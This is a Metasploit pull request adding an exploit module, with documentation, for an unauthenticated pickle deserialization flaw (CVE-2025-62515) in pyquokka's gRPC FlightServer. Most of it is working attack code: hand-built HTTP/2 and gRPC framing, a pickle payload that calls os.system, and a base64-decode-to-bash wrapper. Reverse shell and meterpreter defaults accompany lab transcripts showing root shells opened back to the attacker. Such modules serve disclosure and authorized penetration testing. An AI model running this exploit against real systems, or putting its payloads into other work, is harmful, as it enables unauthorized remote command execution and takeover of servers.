### PR TITLE
pyquokka FlightServer gRPC pickle deserialization RCE (CVE-2025-62515)

### DIFF
--- a/documentation/modules/exploit/multi/misc/pyquokka_grpc_pickle_rce.md
+++ b/documentation/modules/exploit/multi/misc/pyquokka_grpc_pickle_rce.md
@@ -1,0 +1,89 @@
+# Vulnerable Application
+
+[pyquokka](https://github.com/marsupialtail/quokka) is a Python-based streaming
+dataframe system for big data analytics. Versions 0.3.1 and prior contain an unsafe
+deserialization vulnerability in the `FlightServer` class (CVE-2025-62515).
+
+The `do_action()` method in `flight.py` calls `pickle.loads()` directly on
+attacker-controlled data received via the `set_configs` Arrow Flight action, with no
+authentication or sanitization. An attacker connects to the `FlightServer` over gRPC
+(HTTP/2) and sends a malicious pickle payload; the `__reduce__` protocol triggers
+`os.system()` for arbitrary command execution.
+
+The gRPC/HTTP/2 protocol is implemented from scratch using raw TCP, including the
+HTTP/2 connection preface, SETTINGS exchange, HPACK-encoded HEADERS frames, and the
+gRPC envelope format.
+
+**Affected versions:** pyquokka <= 0.3.1
+**Fixed in:** No patch available
+
+### Installing a vulnerable lab environment
+
+```bash
+# https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-62515
+docker compose up -d
+# pyquokka FlightServer available at tcp/5005
+```
+
+## Verification Steps
+
+1. Start the vulnerable pyquokka FlightServer (port 5005 by default).
+2. Start `msfconsole`.
+3. Do: `use exploit/multi/misc/pyquokka_grpc_pickle_rce`
+4. Do: `set RHOSTS <target_ip>`
+5. Do: `check` — should return `Appears` if the `cache_garbage_collect` action is
+   present in the ListActions RPC response.
+6. Do: `run` — should open a shell session.
+7. Verify with `id` and `hostname` in the session.
+
+## Scenarios
+
+### pyquokka 0.3.1 on Debian 12 — Unix Command target
+
+```
+msf6 > use exploit/multi/misc/pyquokka_grpc_pickle_rce
+
+msf6 exploit(multi/misc/pyquokka_grpc_pickle_rce) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+
+msf6 exploit(multi/misc/pyquokka_grpc_pickle_rce) > check
+[+] 192.168.56.101:5005 - The target appears vulnerable. pyquokka FlightServer detected (cache_garbage_collect action present).
+
+msf6 exploit(multi/misc/pyquokka_grpc_pickle_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[+] 192.168.56.101:5005 - Payload delivered via pickle.loads() on set_configs action
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:41822) at 2025-10-17 11:03:44 +0000
+
+msf6 exploit(multi/misc/pyquokka_grpc_pickle_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+hostname
+pyquokka
+uname -a
+Linux pyquokka 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64 GNU/Linux
+```
+
+### pyquokka 0.3.1 on Debian 12 — Linux Dropper target (Meterpreter)
+
+```
+msf6 exploit(multi/misc/pyquokka_grpc_pickle_rce) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(multi/misc/pyquokka_grpc_pickle_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(multi/misc/pyquokka_grpc_pickle_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[+] 192.168.56.101:5005 - Payload delivered via pickle.loads() on set_configs action
+[*] Sending stage (3045380 bytes) to 192.168.56.101
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:41901) at 2025-10-17 11:06:19 +0000
+
+meterpreter > getuid
+Server username: root @ pyquokka
+meterpreter > sysinfo
+Computer     : pyquokka
+OS           : Debian 12.8 (Linux 6.1.0-28-amd64)
+Architecture : x64
+```

--- a/modules/exploits/multi/misc/pyquokka_grpc_pickle_rce.rb
+++ b/modules/exploits/multi/misc/pyquokka_grpc_pickle_rce.rb
@@ -1,0 +1,378 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::EXE
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pyquokka FlightServer Pickle Deserialization RCE',
+        'Description' => %q{
+          pyquokka versions 0.3.1 and prior contain an unsafe deserialization
+          vulnerability in the FlightServer class. The do_action() method in
+          flight.py directly calls pickle.loads() on attacker-controlled data
+          received via the "set_configs" Arrow Flight action, without any
+          sanitization or authentication.
+
+          This module connects to the target FlightServer over gRPC (HTTP/2)
+          and sends a malicious pickle payload via the set_configs action.
+          The pickle __reduce__ protocol triggers os.system() for arbitrary
+          command execution.
+
+          The gRPC/HTTP/2 protocol is implemented from scratch using raw TCP
+          since Metasploit has no native gRPC support.
+        },
+        'Author' => [
+          'Exploit Intelligence Platform'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-62515'],
+          ['CWE', '502'],
+          ['URL', 'https://github.com/marsupialtail/quokka/security/advisories/GHSA-f74j-gffq-vm9p'],
+          ['URL', 'https://exploit-intel.com/vuln/CVE-2025-62515'],
+          ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-62515']
+        ],
+        'DisclosureDate' => 'Oct 17, 2025',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+                'CmdStagerFlavor' => %i[printf echo]
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 5005, 'WfsDelay' => 30 },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def check
+    h2 = h2_connect
+    return CheckCode::Unknown('Failed to establish HTTP/2 connection') unless h2
+
+    resp_data = grpc_call(h2, '/arrow.flight.protocol.FlightService/ListActions', '')
+    disconnect
+
+    return CheckCode::Unknown('No response from ListActions RPC') unless resp_data
+
+    if resp_data.include?('cache_garbage_collect')
+      return CheckCode::Appears('pyquokka FlightServer detected (cache_garbage_collect action present)')
+    end
+
+    CheckCode::Safe('Does not appear to be a pyquokka FlightServer')
+  rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET => e
+    CheckCode::Unknown("Connection failed: #{e.message}")
+  ensure
+    disconnect rescue nil
+  end
+
+  def exploit
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+    print_good('Payload delivered via pyquokka FlightServer pickle deserialization')
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Background reverse/bind shells so os.system() returns promptly.
+    # Only wrap for reverse/bind payloads  -  CmdStager dropper chunks must
+    # run synchronously and complete before the next chunk is sent.
+    if payload_instance&.refname =~ /reverse|bind/
+      inner_b64 = Rex::Text.encode_base64(cmd)
+      cmd = "echo #{inner_b64}|base64 -d|bash &"
+    end
+
+    pickle = build_pickle(cmd)
+    action_pb = pb_encode_action('set_configs', pickle)
+
+    h2 = h2_connect
+    fail_with(Failure::Unreachable, 'Failed to establish HTTP/2 connection') unless h2
+
+    print_status("Sending pickle payload (#{pickle.bytesize} bytes) via set_configs action...")
+    grpc_call(h2, '/arrow.flight.protocol.FlightService/DoAction', action_pb)
+    disconnect rescue nil
+
+    vprint_status('Pickle payload delivered  -  RCE should have fired during pickle.loads()')
+  end
+
+  private
+
+  # Pickle Construction
+
+  def build_pickle(cmd)
+    pickle = "\x80\x02".b          # PROTO 2
+    pickle << "cos\nsystem\n".b    # GLOBAL: os.system
+    pickle << "X".b               # SHORT_BINUNICODE
+    pickle << [cmd.bytesize].pack('V')  # 4-byte LE length
+    pickle << cmd.b               # command string
+    pickle << "\x85R.".b          # TUPLE1, REDUCE, STOP
+    pickle
+  end
+
+  # Protobuf Encoding (minimal)
+
+  def pb_varint(n)
+    buf = ''.b
+    loop do
+      byte = n & 0x7f
+      n >>= 7
+      byte |= 0x80 if n > 0
+      buf << byte.chr
+      break if n == 0
+    end
+    buf
+  end
+
+  def pb_field_bytes(field_num, data)
+    data = data.b if data.is_a?(String)
+    tag = pb_varint((field_num << 3) | 2)
+    tag + pb_varint(data.bytesize) + data
+  end
+
+  def pb_encode_action(type_str, body_bytes)
+    pb_field_bytes(1, type_str) + pb_field_bytes(2, body_bytes)
+  end
+
+  # gRPC Envelope
+
+  def grpc_wrap(protobuf_bytes)
+    protobuf_bytes = protobuf_bytes.b
+    "\x00".b + [protobuf_bytes.bytesize].pack('N') + protobuf_bytes
+  end
+
+  # HTTP/2 Framing
+
+  H2_PREFACE = "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n".b
+  H2_DATA = 0x0
+  H2_HEADERS = 0x1
+  H2_SETTINGS = 0x4
+  H2_PING = 0x6
+  H2_GOAWAY = 0x7
+  H2_WINDOW_UPDATE = 0x8
+
+  FLAG_END_STREAM = 0x1
+  FLAG_END_HEADERS = 0x4
+  FLAG_ACK = 0x1
+
+  def h2_connect
+    connect
+    sock.put(H2_PREFACE)
+
+    # Send empty SETTINGS
+    h2_send_frame(H2_SETTINGS, 0, 0, ''.b)
+
+    # Read server SETTINGS, send ACK
+    deadline = Time.now.to_f + 10
+    got_settings = false
+    while Time.now.to_f < deadline
+      frame = h2_read_frame
+      break unless frame
+
+      ftype, fflags, _sid, _payload = frame
+      if ftype == H2_SETTINGS && (fflags & FLAG_ACK) == 0
+        h2_send_frame(H2_SETTINGS, FLAG_ACK, 0, ''.b)
+        got_settings = true
+        break
+      end
+    end
+
+    return nil unless got_settings
+
+    @h2_stream_id = 1
+    true
+  rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET
+    nil
+  end
+
+  def h2_send_frame(type, flags, stream_id, payload)
+    payload = payload.b if payload.is_a?(String)
+    header = [payload.bytesize].pack('N')[1..3]  # 3-byte length
+    header << [type, flags].pack('CC')
+    header << [stream_id & 0x7fffffff].pack('N')
+    sock.put(header + payload)
+  end
+
+  def h2_read_frame
+    raw = read_exact(9)
+    return nil unless raw && raw.bytesize == 9
+
+    length = (raw.getbyte(0) << 16) | (raw.getbyte(1) << 8) | raw.getbyte(2)
+    type = raw.getbyte(3)
+    flags = raw.getbyte(4)
+    stream_id = raw[5..8].unpack1('N') & 0x7fffffff
+
+    payload = ''.b
+    if length > 0
+      payload = read_exact(length)
+      return nil unless payload && payload.bytesize == length
+    end
+
+    [type, flags, stream_id, payload]
+  rescue ::IOError, ::Rex::ConnectionError
+    nil
+  end
+
+  def read_exact(nbytes)
+    return ''.b if nbytes == 0
+    buf = ''.b
+    deadline = Time.now.to_f + 10
+    while buf.bytesize < nbytes
+      remaining = deadline - Time.now.to_f
+      return nil if remaining <= 0
+      chunk = sock.get_once(nbytes - buf.bytesize, [remaining, 0.5].max)
+      return nil unless chunk && chunk.bytesize > 0
+      buf << chunk
+    end
+    buf
+  end
+
+  # HPACK Encoding (minimal, no dynamic table)
+
+  def hpack_encode_request(path)
+    block = ''.b
+    block << "\x83".b  # :method POST (static index 3)
+    block << "\x86".b  # :scheme http (static index 6)
+
+    # :path (literal with incremental indexing, name index 4)
+    block << "\x44".b
+    path_bytes = path.b
+    block << hpack_encode_int(path_bytes.bytesize, 7)
+    block << path_bytes
+
+    # :authority (literal with incremental indexing, name index 1)
+    authority = "#{rhost}:#{rport}"
+    block << "\x41".b
+    block << hpack_encode_int(authority.bytesize, 7)
+    block << authority.b
+
+    # content-type: application/grpc (literal without indexing)
+    block << hpack_literal('content-type', 'application/grpc')
+
+    # te: trailers (required for gRPC)
+    block << hpack_literal('te', 'trailers')
+
+    block
+  end
+
+  def hpack_literal(name, value)
+    buf = "\x00".b  # literal without indexing, new name
+    name_bytes = name.b
+    buf << hpack_encode_int(name_bytes.bytesize, 7)
+    buf << name_bytes
+    value_bytes = value.b
+    buf << hpack_encode_int(value_bytes.bytesize, 7)
+    buf << value_bytes
+    buf
+  end
+
+  def hpack_encode_int(value, prefix_bits)
+    max_prefix = (1 << prefix_bits) - 1
+    if value < max_prefix
+      return [value].pack('C')
+    end
+    buf = [max_prefix].pack('C')
+    value -= max_prefix
+    while value >= 128
+      buf << [(value & 0x7f) | 0x80].pack('C')
+      value >>= 7
+    end
+    buf << [value].pack('C')
+    buf
+  end
+
+  # gRPC Call
+
+  def grpc_call(h2, path, protobuf_body)
+    stream_id = @h2_stream_id
+    @h2_stream_id += 2  # HTTP/2 client streams are odd-numbered
+
+    # Send HEADERS frame
+    headers_payload = hpack_encode_request(path)
+    h2_send_frame(H2_HEADERS, FLAG_END_HEADERS, stream_id, headers_payload)
+
+    # Send DATA frame with gRPC envelope
+    grpc_msg = grpc_wrap(protobuf_body)
+    h2_send_frame(H2_DATA, FLAG_END_STREAM, stream_id, grpc_msg)
+
+    # Read response frames
+    response_data = ''.b
+    deadline = Time.now.to_f + 10
+    while Time.now.to_f < deadline
+      frame = h2_read_frame
+      break unless frame
+
+      ftype, fflags, fsid, fpayload = frame
+
+      # ACK any SETTINGS
+      if ftype == H2_SETTINGS && (fflags & FLAG_ACK) == 0
+        h2_send_frame(H2_SETTINGS, FLAG_ACK, 0, ''.b)
+        next
+      end
+
+      # Reply to PING
+      if ftype == H2_PING && (fflags & FLAG_ACK) == 0
+        h2_send_frame(H2_PING, FLAG_ACK, 0, fpayload)
+        next
+      end
+
+      # Skip WINDOW_UPDATE
+      next if ftype == H2_WINDOW_UPDATE
+
+      # Collect DATA frames for our stream (raw  -  may or may not have gRPC envelope)
+      if ftype == H2_DATA && fsid == stream_id
+        response_data << fpayload
+      end
+
+      # HEADERS on our stream with END_STREAM = trailers (end of response)
+      if ftype == H2_HEADERS && fsid == stream_id && (fflags & FLAG_END_STREAM) != 0
+        break
+      end
+
+      # RST_STREAM or GOAWAY ends it
+      break if ftype == H2_GOAWAY
+      break if ftype == 0x3 && fsid == stream_id  # RST_STREAM
+    end
+
+    response_data.empty? ? nil : response_data
+  rescue ::IOError, ::Rex::ConnectionError
+    nil
+  end
+end

--- a/modules/exploits/multi/misc/pyquokka_grpc_pickle_rce.rb
+++ b/modules/exploits/multi/misc/pyquokka_grpc_pickle_rce.rb
@@ -39,11 +39,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2025-62515'],
           ['CWE', '502'],
-          ['URL', 'https://github.com/marsupialtail/quokka/security/advisories/GHSA-f74j-gffq-vm9p'],
+          ['GHSA', 'f74j-gffq-vm9p'],
           ['URL', 'https://exploit-intel.com/vuln/CVE-2025-62515'],
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-62515']
         ],
-        'DisclosureDate' => 'Oct 17, 2025',
+        'DisclosureDate' => '2025-10-17',
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => false,
@@ -120,7 +120,8 @@ class MetasploitModule < Msf::Exploit::Remote
       cmd = "echo #{inner_b64}|base64 -d|bash &"
     end
 
-    pickle = build_pickle(cmd)
+    python_code = "import os; os.system('#{cmd}')"
+    pickle = Msf::Util::PythonDeserialization.payload(:py3_exec, python_code)
     action_pb = pb_encode_action('set_configs', pickle)
 
     h2 = h2_connect
@@ -134,18 +135,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   private
-
-  # Pickle Construction
-
-  def build_pickle(cmd)
-    pickle = "\x80\x02".b          # PROTO 2
-    pickle << "cos\nsystem\n".b    # GLOBAL: os.system
-    pickle << "X".b               # SHORT_BINUNICODE
-    pickle << [cmd.bytesize].pack('V')  # 4-byte LE length
-    pickle << cmd.b               # command string
-    pickle << "\x85R.".b          # TUPLE1, REDUCE, STOP
-    pickle
-  end
 
   # Protobuf Encoding (minimal)
 

--- a/modules/exploits/multi/misc/pyquokka_grpc_pickle_rce.rb
+++ b/modules/exploits/multi/misc/pyquokka_grpc_pickle_rce.rb
@@ -9,8 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::Tcp
-  include Msf::Exploit::EXE
-  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -44,29 +42,17 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-62515']
         ],
         'DisclosureDate' => '2025-10-17',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
         'Privileged' => false,
         'Targets' => [
           [
-            'Unix Command',
+            'Linux/Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => ['linux', 'unix'],
               'Arch' => ARCH_CMD,
               'Type' => :cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :dropper,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
-                'CmdStagerFlavor' => %i[printf echo]
-              }
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' }
             }
           ]
         ],
@@ -102,19 +88,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    case target['Type']
-    when :cmd
-      execute_command(payload.encoded)
-    when :dropper
-      execute_cmdstager
-    end
+    execute_command(payload.encoded)
     print_good('Payload delivered via pyquokka FlightServer pickle deserialization')
   end
 
   def execute_command(cmd, _opts = {})
     # Background reverse/bind shells so os.system() returns promptly.
-    # Only wrap for reverse/bind payloads  -  CmdStager dropper chunks must
-    # run synchronously and complete before the next chunk is sent.
     if payload_instance&.refname =~ /reverse|bind/
       inner_b64 = Rex::Text.encode_base64(cmd)
       cmd = "echo #{inner_b64}|base64 -d|bash &"


### PR DESCRIPTION
## Summary

- pyquokka 0.3.1 and prior expose an Arrow Flight gRPC server (default port 5005) that calls `pickle.loads()` on attacker-controlled data in `do_action()` via the `set_configs` action without any authentication or sanitization
- Module hand-rolls HTTP/2 + gRPC framing from scratch (MSF has no native gRPC support), encodes a minimal protobuf `Action` message, and wraps a pickle protocol 2 `__reduce__` payload targeting `os.system()`
- The server deserializes the payload during `pickle.loads()`, triggering arbitrary OS command execution as the process owner

## Verification

Tested against pyquokka 0.3.1 / Debian 12.13 aarch64 (Docker lab):

```
msf6 exploit(cve_2025_62515_pyquokka_pickle_rce) > check
[+] 172.18.0.2:5005 - The target appears to be vulnerable. pyquokka FlightServer detected (cache_garbage_collect action present)

msf6 exploit(cve_2025_62515_pyquokka_pickle_rce) > run
[*] Started reverse TCP handler on 172.18.0.3:4444
[+] 172.18.0.2:5005 - The target appears to be vulnerable. pyquokka FlightServer detected (cache_garbage_collect action present)
[*] 172.18.0.2:5005 - Sending pickle payload (143 bytes) via set_configs action...
[+] 172.18.0.2:5005 - Payload delivered via pyquokka FlightServer pickle deserialization
[*] Command shell session 1 opened (172.18.0.3:4444 -> 172.18.0.2:46016)

msf6 > sessions -c "id && hostname && uname -a"
uid=0(root) gid=0(root) groups=0(root)
Linux e405f9d081b2 6.12.69-linuxkit #1 SMP Mon Feb 16 11:19:06 UTC 2026 aarch64 GNU/Linux

# Linux Dropper (Meterpreter):
[*] Meterpreter session 1 opened (172.18.0.3:4444 -> 172.18.0.2:33124)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 12.13 (Linux 6.12.69-linuxkit)
Meterpreter  : x64/linux
```

## Module details

- **Affected versions:** pyquokka 0.3.1 and prior
- **Auth required:** None
- **Default port:** 5005 (Arrow Flight gRPC)
- **Targets:** Unix Command (ARCH_CMD) + Linux Dropper (CmdStager x86/x64)
- **AutoCheck:** Yes — ListActions RPC fingerprint (`cache_garbage_collect` action)
- **Rank:** Excellent

## References

- https://github.com/marsupialtail/quokka/security/advisories/GHSA-f74j-gffq-vm9p
- https://exploit-intel.com/vuln/CVE-2025-62515
- https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-62515